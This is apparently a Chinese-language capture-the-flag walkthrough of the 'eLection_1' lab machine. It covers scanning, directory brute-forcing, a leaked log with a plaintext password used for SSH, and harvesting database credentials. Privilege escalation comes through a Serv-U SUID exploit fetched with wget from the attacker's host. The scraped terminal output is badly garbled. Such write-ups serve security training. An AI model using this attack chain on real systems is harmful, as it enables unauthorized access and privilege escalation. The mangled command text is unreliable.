eLection_1 靶机 信息收集 1 2 3 4 5 6 7 8 9 10 11 12 ┌──(kali㉿kali)-[~]for 192.168.56.128done : 1 IP address (1 host up) scanned in 9.04 seconds
开放了 22 端口和 80 端口
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 ┌──(kali㉿kali)-[~]for 192.168.56.128type : general purposedone : 1 IP address (1 host up) scanned in 14.53 seconds
Ubuntu 操作系统,80 端口是 apache 搭建的,首页是 apache2 的默认界面
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 ┌──(kali㉿kali)-[~]for 192.168.56.128't find any stored XSS vulnerabilities. |_http-csrf: Couldn' t find any CSRF vulnerabilities.'t find any DOM based XSS. | http-enum: | /robots.txt: Robots file | /phpinfo.php: Possible information file |_ /phpmyadmin/: phpMyAdmin MAC Address: 08:00:27:FE:C8:1D (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 37.52 seconds
漏洞脚本扫描得到了 robots.txt, phpinfo.php, phpmyadmin
目录爆破 打开 robots.txt 查看,并使用 dirsearch 进行目录爆破。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 ┌──(kali㉿kali)-[~/Downloads/eLection_1]log
目录爆破并没有得到有效信息,而 robots.txt 给出了一些看起来可能是目录的东西
依次手动尝试发现只有 election 目录可以访问
是一个投票系统,提示注册成为 admin,然后在下方输入投票代码,尝试输入了一下发现只有五个字符才会有验证码错误的提示
1 Voter's Code is incorrect! Please check or re-register!
burp 抓包发现
POST 请求发向另一个 php 文件,并且 election 目录下似乎有别的目录,尝试再一次目录爆破
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 ┌──(kali㉿kali)-[~]log
发现了很多目录,尝试访问 admin/index.php
似乎需要输入 admin 的 id,随便输入了一下,发现提示
看来不一定能使用爆破了(后续 burp 抓包发现这是 js 文件根据请求包字段做的限制,其实可以绕过)。再看看别的目录,data 目录
logs 目录
日志文件泄露 有个日志文件下载下来看看
1 2 3 [2020 -01 -01 00 :00 :00 ] Assigned Password for the user love: P@$$w0rd@123 [2020 -04 -03 00 :13 :53 ] Love added candidate 'Love' . [2020 -04 -08 19 :26 :34 ] Love has been logged in from Unknown IP on Firefox (Linux).
ssh 登录 竟然在这里拿到了用户名和密码,尝试 ssh 登录
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 ┌──(kali㉿kali)-[~]'s password: Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-46-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 74 packages can be updated. 28 updates are security updates. Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Your Hardware Enablement Stack (HWE) is supported until April 2023. Last login: Fri Jul 14 19:22:22 2023 from 192.168.56.106 love@election:~$ id uid=1000(love) gid=1000(love) groups=1000(love),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),126(sambashare) love@election:~$ whoami love love@election:~$ uname -a Linux election 5.3.0-46-generic #38~18.04.1-Ubuntu SMP Tue Mar 31 04:17:56 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux love@election:~$ ip a 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000 link/ether 08:00:27:fe:c8:1d brd ff:ff:ff:ff:ff:ff inet 192.168.56.128/24 brd 192.168.56.255 scope global dynamic noprefixroute enp0s3 valid_lft 539sec preferred_lft 539sec inet6 fe80::321e:9192:79f9:852/64 scope link noprefixroute valid_lft forever preferred_lft forever love@election:~$ sudo -l [sudo] password for love: Sorry, user love may not run sudo on election.
基础的信息收集顺便也完成了
提权 看看用户家目录
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 love@election:~$ ls -liahlocal
对各个文件夹进行信息收集,在 Desktop 目录中发现了 user.txt,尝试在 .mozilla 看看有没有可能存储了保存的密码,很可惜并没有,借助于 gpt 可以迅速感知各个文件夹的作用,方便信息筛选。看看定时任务和 SUID 文件
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 love@election:/var/www/html/election/admin/ajax$ find / -type f -perm -04000 -ls 2>/dev/null
好像并没有很值得注意的地方,/usr/local/Serv-U/Serv-U 文件似乎有点特殊。不过 gtfobins 中没有它的利用,先看看别的吧,去找找网站目录配置文件的数据库密码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 love@election:/var/www/html$ ls -liahcd electionls -liah
依次查看文件
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 love@election:/var/www/html/election$ cat version.tp"codename" : "Arctic Fox" ,"major" : 2,"minor" : 0,"released_date" : "2019-03-06 00:00:00" cat card.phpcat .htaccesscat index.phpif (!file_exists("./admin/inc/conn.php" )){"Location: ./install/?_rdr" );exit ();"./lib/homeAPI.php" ;$home = new homeAPI();$localize = $home -> localize();if ($home -> isRegistered()){echo "$localize [alert_redirecting]<script>setTimeout(function(){top.location='./pemilihan.php?_loggedin';},1000)</script>" ;exit ();$home -> getThemeFile("home.php" );$home -> db_disconnect();
index.php 文件中提到了一个文件 ./admin/inc/conn.php,根据名字猜测应该是数据库连接配置文件
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 love@election:/var/www/html/election$ cat pemilihan.phpif (!file_exists("./admin/inc/conn.php" )){"Location: ./install/?_rdr" );exit ();"./lib/homeAPI.php" ;$election = new homeAPI();$localize = $election -> localize();if ($election -> isRegistered() == false ){echo "$localize [alert_acces_denied]<script>setTimeout(function(){top.location='./?_nosession';},1000)</script>" ;exit ();$timeNow = strtotime($election -> getCurrentTimestamp());$timeExp = strtotime($_SESSION ['os_pemilih_kadaluarsa' ]);if ($timeNow > $timeExp ){unset ($_SESSION ['os_pemilih' ],$_SESSION ['os_pemilih_kadaluarsa' ],$_SESSION ['os_pemilih_panitia' ]);echo "$localize [alert_session_expired]<script>setTimeout(function(){top.location='./?_nosession';},1000)</script>" ;exit ();$countdown = "<span id=\"waktu\" data-kadaluarsa=\"$_SESSION [os_pemilih_kadaluarsa]\" data-multivote=\"" .$election -> getSettings("multivote" )."\">$localize [text_loading]</span>" ;$election -> getThemeFile("election.php" );$election -> db_disconnect();
的确有数据库用户名和密码,尝试进入数据库看看
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 love@election:/var/www/html/election/admin/inc$ mysql -unewuser -pid is 7874'help;' or '\h' for help . Type '\c' to clear the current input statement.in set (0.00 sec)for completion of table and column namesin set (0.00 sec)select * from tb_guru;set (0.00 sec)select * from tb_hakpilih;set (0.00 sec)select * from tb_kandidat;id | nama | kelas | bio | fbid |in set (0.00 sec)select * from tb_level;id | level |in set (0.00 sec)select * from tb_panitia;id | no_induk | nama | level | password |in set (0.00 sec)select * from tb_pengaturan;id | judul | subjudul | instansi | themes | multivote | nullvote | enable_poll | election_timeout | disabled_text | timezone | default_language | logging | v_major | v_minor |in set (0.00 sec)
拿到了一个新的密码,结合数据库链接密码,尝试进行密码碰撞,看看 root 的密码有没有可能是其中之一
1 2 3 4 5 6 love@election:/var/www/html/election/admin/inc$ su -
失败,看了眼数据库提权,也无法利用,在这里卡了很久,尝试利用数据库中的信息登录网站看看,但是网站连接似乎有点问题,密码提示失败。后续又跑去看了进程和网络连接的状况,均没有收获。而定时任务中也没有信息。
Serv-U FTP Server 提权 卡了许久,最后尝试搜索 SUID 中不熟悉文件的 exploit
发现了可能存在的漏洞,将其下载到本地再上传到靶机
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 love@election:/tmp$ wget http://192.168.56.106:8088/47009.cin 0s groups =0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),126(sambashare),1000(love)groups =0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),126(sambashare),1000(love)link /loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 link /ether 08:00:27:fe:c8:1d brd ff:ff:ff:ff:ff:ff link noprefixroute local
